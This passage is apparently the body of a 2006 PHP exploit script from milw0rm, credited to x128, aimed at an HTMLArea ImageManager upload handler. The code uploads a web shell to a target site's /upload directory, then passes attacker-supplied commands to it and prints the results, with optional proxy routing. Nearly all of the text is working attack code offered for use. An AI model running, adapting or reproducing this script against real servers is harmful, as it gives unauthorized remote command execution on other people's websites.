x128.net oo website : www.x128.net\n"; } function exploit_execute() { $connection = curl_init(); if ($_SERVER['argv'][3]) { curl_setopt($connection, CURLOPT_TIMEOUT, 8); curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][3]); } curl_setopt ($connection, CURLOPT_USERAGENT, 'x128'); curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($connection, CURLOPT_HEADER, 0); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php"); $source = curl_exec($connection); if(strpos($source, "404")) { $shell = fopen("shell.php", "w"); fwrite($shell, ""); fclose($shell); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/htmlarea/popups/ImageManager/images.php"); curl_setopt ($connection, CURLOPT_POST, 1); curl_setopt ($connection, CURLOPT_POSTFIELDS, array("upload" => "@shell.php", "dirPath"=> "/upload")); curl_exec($connection) or die("oo error - cannot connect!\n"); sleep(2); unlink("shell.php"); } curl_setopt ($connection, CURLOPT_POST, 0); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php?shell=" . urlencode($_SERVER['argv'][2])); $source = curl_exec($connection) or die("oo error - cannot connect!\n"); echo $source; curl_close ($connection); } exploit_init(); exploit_header(); exploit_execute(); exploit_bottom(); ?> # milw0rm.com [2006-03-21]